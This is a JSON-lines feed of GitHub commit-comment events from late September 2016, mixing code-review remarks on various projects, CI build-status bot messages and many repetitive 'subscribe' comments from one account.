{"id":"4640900859","type":"CommitCommentEvent","actor":{"login":"Fryyyyy"},"repo":{"name":"Fryyyyy/Frytherer"},"payload":{"comment":{"id":19234868,"position":16,"line":509,"path":"judgebot.py","commit_id":"3fe77595d2847f735acb4467bcef97280741035d","created_at":"2016-09-30T01:08:04Z","updated_at":"2016-09-30T01:08:04Z","body":"We should compile the regex once, at the beginning of the file, not every time we dispatch a message :)"}},"created_at":"2016-09-30T01:08:04Z"}
{"id":"4640902049","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234870,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:08:29Z","updated_at":"2016-09-30T01:08:29Z","body":"subscribe 112"}},"created_at":"2016-09-30T01:08:29Z"}
{"id":"4640903169","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234872,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:08:54Z","updated_at":"2016-09-30T01:08:54Z","body":"subscribe 113"}},"created_at":"2016-09-30T01:08:54Z"}
{"id":"4640904172","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234875,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:09:17Z","updated_at":"2016-09-30T01:09:17Z","body":"subscribe 114"}},"created_at":"2016-09-30T01:09:17Z"}
{"id":"4640905382","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234879,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:09:47Z","updated_at":"2016-09-30T01:09:47Z","body":"subscribe 115"}},"created_at":"2016-09-30T01:09:47Z"}
{"id":"4640905792","type":"CommitCommentEvent","actor":{"login":"Fryyyyy"},"repo":{"name":"Fryyyyy/Frytherer"},"payload":{"comment":{"id":19234882,"position":18,"line":511,"path":"judgebot.py","commit_id":"3fe77595d2847f735acb4467bcef97280741035d","created_at":"2016-09-30T01:09:57Z","updated_at":"2016-09-30T01:09:57Z","body":"We're matching the message against the regex twice"}},"created_at":"2016-09-30T01:09:57Z"}
{"id":"4640906314","type":"CommitCommentEvent","actor":{"login":"lolilolicon"},"repo":{"name":"kfish/xsel"},"payload":{"comment":{"id":19234884,"position":null,"line":null,"path":null,"commit_id":"a20077fef1e665dc342448bceee1d759c13c10bd","created_at":"2016-09-30T01:10:09Z","updated_at":"2016-09-30T01:10:09Z","body":"Perhaps as suggested in #10 `XDG_CACHE_HOME/xsel/log` would be even better.\r\nAlso, give the man page some love? ;)"}},"created_at":"2016-09-30T01:10:09Z"}
{"id":"4640906426","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234885,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:10:12Z","updated_at":"2016-09-30T01:10:12Z","body":"subscribe 116"}},"created_at":"2016-09-30T01:10:12Z"}
{"id":"4640907586","type":"CommitCommentEvent","actor":{"login":"Fryyyyy"},"repo":{"name":"Fryyyyy/Frytherer"},"payload":{"comment":{"id":19234889,"position":25,"line":518,"path":"judgebot.py","commit_id":"3fe77595d2847f735acb4467bcef97280741035d","created_at":"2016-09-30T01:10:38Z","updated_at":"2016-09-30T01:10:38Z","body":"If \"num\" is None, then casting it to an int will throw an exception"}},"created_at":"2016-09-30T01:10:38Z"}
{"id":"4640907711","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234891,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:10:40Z","updated_at":"2016-09-30T01:10:40Z","body":"subscribe 117"}},"created_at":"2016-09-30T01:10:40Z"}
{"id":"4640909004","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234893,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:11:06Z","updated_at":"2016-09-30T01:11:06Z","body":"subscribe 118"}},"created_at":"2016-09-30T01:11:06Z"}
{"id":"4640909322","type":"CommitCommentEvent","actor":{"login":"Fryyyyy"},"repo":{"name":"Fryyyyy/Frytherer"},"payload":{"comment":{"id":19234895,"position":36,"line":528,"path":"judgebot.py","commit_id":"3fe77595d2847f735acb4467bcef97280741035d","created_at":"2016-09-30T01:11:13Z","updated_at":"2016-09-30T01:11:13Z","body":"Spaces around arguments etc etc"}},"created_at":"2016-09-30T01:11:13Z"}
{"id":"4640909878","type":"CommitCommentEvent","actor":{"login":"JongManHong"},"repo":{"name":"JongManHong/face-emotion-detector"},"payload":{"comment":{"id":19234899,"position":null,"line":null,"path":null,"commit_id":"089a5c6787c1af5a00c89cdedc62ef211e69c6ac","created_at":"2016-09-30T01:11:26Z","updated_at":"2016-09-30T01:11:26Z","body":"haarcascade_frontalface_alt.xml  파일도 한 폴더에 있어야 함.  python 버전은 2.7 임."}},"created_at":"2016-09-30T01:11:26Z"}
{"id":"4640910033","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234900,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:11:29Z","updated_at":"2016-09-30T01:11:29Z","body":"subscribe 119"}},"created_at":"2016-09-30T01:11:29Z"}
{"id":"4640911359","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234906,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:11:58Z","updated_at":"2016-09-30T01:11:58Z","body":"subscribe 120"}},"created_at":"2016-09-30T01:11:58Z"}
{"id":"4640914426","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234912,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:13:10Z","updated_at":"2016-09-30T01:13:10Z","body":"subscribe 120"}},"created_at":"2016-09-30T01:13:10Z"}
{"id":"4640916248","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234914,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:13:53Z","updated_at":"2016-09-30T01:13:53Z","body":"subscribe 121"}},"created_at":"2016-09-30T01:13:53Z"}
{"id":"4640917422","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234916,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:14:19Z","updated_at":"2016-09-30T01:14:19Z","body":"subscribe 122"}},"created_at":"2016-09-30T01:14:19Z"}
{"id":"4640917518","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19234917,"position":null,"line":null,"path":null,"commit_id":"7c69c910891516566da80e9048bbeff824fd3ef2","created_at":"2016-09-30T01:14:21Z","updated_at":"2016-09-30T01:14:21Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T01:14:21Z"}
{"id":"4640918960","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234919,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:14:53Z","updated_at":"2016-09-30T01:14:53Z","body":"subscribe 123"}},"created_at":"2016-09-30T01:14:53Z"}
{"id":"4640920235","type":"CommitCommentEvent","actor":{"login":"lazedo"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":19234922,"position":5,"line":372,"path":"core/kazoo_amqp/src/api/kapi_conference.erl","commit_id":"db789d4dec541ed3255922d5be34b4f52e3d75e0","created_at":"2016-09-30T01:15:22Z","updated_at":"2016-09-30T01:15:22Z","body":"@jamesaimonetti @fenollp this change broke conference configuration.\r\nin a list of required headers. when one of its elements is it self a list, then one member of that list is required. when freeswitch fetches for caller-controls we return `Caller-Controls` not `Profiles`, the removal of made Profiles mandatory when we were only returning Caller-Controls."}},"created_at":"2016-09-30T01:15:22Z"}
{"id":"4640920357","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234923,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:15:24Z","updated_at":"2016-09-30T01:15:24Z","body":"subscribe 124"}},"created_at":"2016-09-30T01:15:24Z"}
{"id":"4640920630","type":"CommitCommentEvent","actor":{"login":"toutou85"},"repo":{"name":"toutou85/TouggourtiWeb"},"payload":{"comment":{"id":19234924,"position":7,"line":125,"path":"src/app/views/layouts/layout.html","commit_id":"fe90d0d1ea2d99e77656d8ac21d8cf8714db3bc8","created_at":"2016-09-30T01:15:31Z","updated_at":"2016-09-30T01:15:31Z","body":"<p><a href=\"#\" target=\"_blank\">taha</a></p>"}},"created_at":"2016-09-30T01:15:31Z"}
{"id":"4640920751","type":"CommitCommentEvent","actor":{"login":"Dsuke-K"},"repo":{"name":"bami2/matlab"},"payload":{"comment":{"id":19234925,"position":55,"line":194,"path":"test_read_FTRlist.c","commit_id":"24f10e228b9e558c33f62f05d498a6bd86a0d4dc","created_at":"2016-09-30T01:15:34Z","updated_at":"2016-09-30T01:15:34Z","body":"右辺のStim_Col_Rにもインデックスが必要。\r\n\r\ng_param[Stim_Col_R[i]]=g_param[Stim_Col_R[0]];"}},"created_at":"2016-09-30T01:15:34Z"}
{"id":"4640921608","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234926,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:15:53Z","updated_at":"2016-09-30T01:15:53Z","body":"subscribe 125"}},"created_at":"2016-09-30T01:15:53Z"}
{"id":"4640922199","type":"CommitCommentEvent","actor":{"login":"angedevelop"},"repo":{"name":"angedevelop/Prueba"},"payload":{"comment":{"id":19234928,"position":null,"line":null,"path":null,"commit_id":"8ed5c32c43020b7b2ee27ae619037e648aae11e3","created_at":"2016-09-30T01:16:07Z","updated_at":"2016-09-30T01:16:07Z","body":"hola"}},"created_at":"2016-09-30T01:16:07Z"}
{"id":"4640922468","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19234930,"position":null,"line":null,"path":null,"commit_id":"c85adb6bd656cc55a3efbf6b919b3896fcfe1f19","created_at":"2016-09-30T01:16:12Z","updated_at":"2016-09-30T01:16:12Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 37](http://munit-050:8112/tc/viewLog.html?buildId=99150&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-30T01:16:12Z"}
{"id":"4640922648","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234931,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:16:17Z","updated_at":"2016-09-30T01:16:17Z","body":"subscribe 126"}},"created_at":"2016-09-30T01:16:17Z"}
{"id":"4640923814","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234935,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:16:42Z","updated_at":"2016-09-30T01:16:42Z","body":"subscribe 127"}},"created_at":"2016-09-30T01:16:42Z"}
{"id":"4640923871","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19234936,"position":null,"line":null,"path":null,"commit_id":"7c69c910891516566da80e9048bbeff824fd3ef2","created_at":"2016-09-30T01:16:43Z","updated_at":"2016-09-30T01:16:43Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T01:16:43Z"}
{"id":"4640923913","type":"CommitCommentEvent","actor":{"login":"fkling"},"repo":{"name":"LeReacteur/exerslide"},"payload":{"comment":{"id":19234937,"position":null,"line":null,"path":null,"commit_id":"8d7b5e2cf07ac744cdbda970e8e8a094e5a4e06a","created_at":"2016-09-30T01:16:44Z","updated_at":"2016-09-30T01:16:44Z","body":"Do you want `markdown-it-attrs` to be added to exerslide by default? If you just want to use this in your own presentations, you don't have to fork exerslide. You can extend the markdown parser in an individual presentation by passing the `markdown-converter` option:\r\n\r\nIn `js/presentation.js`:\r\n\r\n```js\r\npresent({\r\n  masterLayout: MasterLayout,\r\n  slideLayout: SlideLayout,\r\n  references,\r\n  slides: __exerslide_slides__,\r\n  'markdown-converter': md => {\r\n    md.use(require('markdown-it-attrs'));\r\n  }\r\n});\r\n```\r\n\r\nSee https://github.com/fkling/jsbasics/blob/aeec7b86933e608d70da9fa10a05d5633a5846f2/js/presentation.js for an example."}},"created_at":"2016-09-30T01:16:44Z"}
{"id":"4640924312","type":"CommitCommentEvent","actor":{"login":"lukefromdc"},"repo":{"name":"lukefromdc/ubuntustudio-legacy-icon-theme"},"payload":{"comment":{"id":19234938,"position":null,"line":null,"path":null,"commit_id":"fe9f3d6412b7a2fc39dbaa331e75ef556cd94436","created_at":"2016-09-30T01:16:53Z","updated_at":"2016-09-30T01:16:53Z","body":"the Makefile change permits the removal of copied makefile, makefile.in, and makefile.am from the directory in which the icons are installed to error out silently when it gets run more than once and these files are no longer there.\r\n\r\nThe icon cache update code still needs to be added to the makefile code for direct installations (not by making debs/rpms/etc) but one thing at a time"}},"created_at":"2016-09-30T01:16:53Z"}
{"id":"4640924874","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234940,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:17:06Z","updated_at":"2016-09-30T01:17:06Z","body":"subscribe 128"}},"created_at":"2016-09-30T01:17:06Z"}
{"id":"4640925172","type":"CommitCommentEvent","actor":{"login":"ondevops"},"repo":{"name":"ondevops/dev-company-work"},"payload":{"comment":{"id":19234941,"position":null,"line":null,"path":null,"commit_id":"f6ce461aedfa11c7ab3cd6b0c36383fa8d93c722","created_at":"2016-09-30T01:17:13Z","updated_at":"2016-09-30T01:17:13Z","body":"W must be in capital.. Add few line extra"}},"created_at":"2016-09-30T01:17:13Z"}
{"id":"4640926063","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234944,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:17:34Z","updated_at":"2016-09-30T01:17:34Z","body":"subscribe 129"}},"created_at":"2016-09-30T01:17:34Z"}
{"id":"4640926813","type":"CommitCommentEvent","actor":{"login":"fcu-D0440762"},"repo":{"name":"fcu-d0381751/OOP_HW1"},"payload":{"comment":{"id":19234948,"position":null,"line":null,"path":null,"commit_id":"0047da1110adb41c9f15e0e721007347bbf7e282","created_at":"2016-09-30T01:17:51Z","updated_at":"2016-09-30T01:17:51Z","body":"what a beautiful code ~~ !!!!!"}},"created_at":"2016-09-30T01:17:51Z"}
{"id":"4640927458","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234949,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:18:04Z","updated_at":"2016-09-30T01:18:04Z","body":"subscribe 130"}},"created_at":"2016-09-30T01:18:04Z"}
{"id":"4640927861","type":"CommitCommentEvent","actor":{"login":"lazedo"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":19234950,"position":5,"line":76,"path":"core/kazoo_amqp/src/api/kapi_metaflow.erl","commit_id":"db789d4dec541ed3255922d5be34b4f52e3d75e0","created_at":"2016-09-30T01:18:12Z","updated_at":"2016-09-30T01:18:12Z","body":"@jamesaimonetti @fenollp same here. we require a `Call` or a `Call-ID`"}},"created_at":"2016-09-30T01:18:12Z"}
{"id":"4640928651","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234953,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:18:31Z","updated_at":"2016-09-30T01:18:31Z","body":"subscribe 131"}},"created_at":"2016-09-30T01:18:31Z"}
{"id":"4640928998","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19234954,"position":null,"line":null,"path":null,"commit_id":"8518d2276061c7232930a85289ad634dfd80e51d","created_at":"2016-09-30T01:18:38Z","updated_at":"2016-09-30T01:18:38Z","body":"Also see [Issue 310: Coverity findings CID 171217-171280: Resource leak (RESOURCE_LEAK)](https://github.com/weidai11/cryptopp/issues/310)."}},"created_at":"2016-09-30T01:18:38Z"}
{"id":"4640929759","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234957,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:18:56Z","updated_at":"2016-09-30T01:18:56Z","body":"subscribe 132"}},"created_at":"2016-09-30T01:18:56Z"}
{"id":"4640930969","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234960,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:19:25Z","updated_at":"2016-09-30T01:19:25Z","body":"subscribe 133"}},"created_at":"2016-09-30T01:19:25Z"}
{"id":"4640931152","type":"CommitCommentEvent","actor":{"login":"fcu-D0440762"},"repo":{"name":"Simposon/OOP-W2"},"payload":{"comment":{"id":19234961,"position":null,"line":null,"path":null,"commit_id":"d264aa65a9cfb949eb0af2e1c8650771d2f4d10d","created_at":"2016-09-30T01:19:29Z","updated_at":"2016-09-30T01:19:29Z","body":"hello ~"}},"created_at":"2016-09-30T01:19:29Z"}
{"id":"4640932091","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234963,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:19:51Z","updated_at":"2016-09-30T01:19:51Z","body":"subscribe 134"}},"created_at":"2016-09-30T01:19:51Z"}
{"id":"4640932302","type":"CommitCommentEvent","actor":{"login":"brentp"},"repo":{"name":"gogetdata/ggd-cli"},"payload":{"comment":{"id":19234965,"position":null,"line":null,"path":null,"commit_id":"6ebd8cc56a828c7b1389d13668c16617eeef7d63","created_at":"2016-09-30T01:19:56Z","updated_at":"2016-09-30T01:19:56Z","body":"this isn't sufficient. just get rid of rinfo completely and do:\r\n```\r\nif info.name in (\"\"info/recipe/meta.yaml\", \"info/meth.yaml\"):\r\n    break\r\n```"}},"created_at":"2016-09-30T01:19:56Z"}
{"id":"4640933649","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234969,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:20:27Z","updated_at":"2016-09-30T01:20:27Z","body":"subscribe 135"}},"created_at":"2016-09-30T01:20:27Z"}
{"id":"4640933732","type":"CommitCommentEvent","actor":{"login":"DogRiley"},"repo":{"name":"joemcbride/outlander-osx"},"payload":{"comment":{"id":19234970,"position":null,"line":null,"path":null,"commit_id":"e68204e744cbcb2792b0c1a0fb1afc5704d7aba7","created_at":"2016-09-30T01:20:29Z","updated_at":"2016-09-30T01:20:29Z","body":"The limiting of the game window has greatly increased stability and speed IMO.  I like it.  New options would be to add preferences for write to log file and customize the size of the buffer (reverse order for priority)\r\n\r\nThanks Joe!"}},"created_at":"2016-09-30T01:20:29Z"}
{"id":"4640934831","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234972,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:20:54Z","updated_at":"2016-09-30T01:20:54Z","body":"subscribe 136"}},"created_at":"2016-09-30T01:20:54Z"}
{"id":"4640935991","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234975,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:21:21Z","updated_at":"2016-09-30T01:21:21Z","body":"subscribe 137"}},"created_at":"2016-09-30T01:21:21Z"}
{"id":"4640937135","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234979,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:21:46Z","updated_at":"2016-09-30T01:21:46Z","body":"subscribe 138"}},"created_at":"2016-09-30T01:21:46Z"}
{"id":"4640938452","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234981,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:22:13Z","updated_at":"2016-09-30T01:22:13Z","body":"subscribe 139"}},"created_at":"2016-09-30T01:22:13Z"}
{"id":"4640938680","type":"CommitCommentEvent","actor":{"login":"vhe182"},"repo":{"name":"besanradwan/rpc-perf-scripts"},"payload":{"comment":{"id":19234983,"position":62,"line":115,"path":"utils/pkb_fio_results_log_parser.py","commit_id":"a55316b42731b50bba2365788022c22be0f071b4","created_at":"2016-09-30T01:22:17Z","updated_at":"2016-09-30T01:22:17Z","body":"Everything looks great.  I just have a question for curiosity, what happened to blocksize?  Why are you not calling find_key() for it?  Maybe it was mentioned in a conversation earlier today but I must not have been apart of that particular one.  Look forward to learning about it!\r\n\r\nOtherwise LGTM"}},"created_at":"2016-09-30T01:22:17Z"}
{"id":"4640939161","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19234985,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-30T01:22:29Z","updated_at":"2016-09-30T01:22:29Z","body":"@alexkulya i think this to work need to implement the call for all this generator for example in the movement generators mayba later i will push something to help you, cant test as i dont have yet the mmaps have to download them tomorrow"}},"created_at":"2016-09-30T01:22:29Z"}
{"id":"4640939573","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234986,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:22:39Z","updated_at":"2016-09-30T01:22:39Z","body":"subscribe 140"}},"created_at":"2016-09-30T01:22:39Z"}
{"id":"4640940706","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234988,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:23:06Z","updated_at":"2016-09-30T01:23:06Z","body":"subscribe 141"}},"created_at":"2016-09-30T01:23:06Z"}
{"id":"4640941921","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234992,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:23:35Z","updated_at":"2016-09-30T01:23:35Z","body":"subscribe 142"}},"created_at":"2016-09-30T01:23:35Z"}
{"id":"4640943216","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234996,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:24:03Z","updated_at":"2016-09-30T01:24:03Z","body":"subscribe 143"}},"created_at":"2016-09-30T01:24:03Z"}
{"id":"4640944307","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234999,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:24:29Z","updated_at":"2016-09-30T01:24:29Z","body":"subscribe 144"}},"created_at":"2016-09-30T01:24:29Z"}
{"id":"4640945180","type":"CommitCommentEvent","actor":{"login":"pabloram232"},"repo":{"name":"pabloram232/Desarrollo-de-Aplicaciones-II"},"payload":{"comment":{"id":19235000,"position":null,"line":null,"path":null,"commit_id":"29da0c835d5e4bc05967728b2ea8bb50bc7820ed","created_at":"2016-09-30T01:24:50Z","updated_at":"2016-09-30T01:24:50Z","body":"\r\n\r\n\r\n\r\n[Incident.zip](https://github.com/pabloram232/Desarrollo-de-Aplicaciones-II/files/501993/Incident.zip)\r\n"}},"created_at":"2016-09-30T01:24:50Z"}
{"id":"4640945349","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235001,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:24:54Z","updated_at":"2016-09-30T01:24:54Z","body":"subscribe 145"}},"created_at":"2016-09-30T01:24:54Z"}
{"id":"4640946825","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235005,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:25:27Z","updated_at":"2016-09-30T01:25:27Z","body":"subscribe 146"}},"created_at":"2016-09-30T01:25:27Z"}
{"id":"4640947917","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235008,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:25:54Z","updated_at":"2016-09-30T01:25:54Z","body":"subscribe 147"}},"created_at":"2016-09-30T01:25:54Z"}
{"id":"4640948100","type":"CommitCommentEvent","actor":{"login":"gabehollombe"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19235009,"position":1,"line":1,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-30T01:25:59Z","updated_at":"2016-09-30T01:25:59Z","body":"@hyanying Is only slightly wrong in her terminology -- `home.html.erb` is a view, not a partial. Partials are little sub-views that begin with an underscore like this: `_person.html.erb`.  But she's right that the application.html.erb  layout file inside `app/views/layouts/` is the master template and each view's content gets rendered inside that file's `yield` section.  You can do more fancy stuff with multiple yields for different parts of content, but we can explain that more later."}},"created_at":"2016-09-30T01:25:59Z"}
{"id":"4640948633","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19235013,"position":null,"line":null,"path":null,"commit_id":"c85adb6bd656cc55a3efbf6b919b3896fcfe1f19","created_at":"2016-09-30T01:26:13Z","updated_at":"2016-09-30T01:26:13Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 37](http://munit-050:8112/tc/viewLog.html?buildId=99150&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-30T01:26:13Z"}
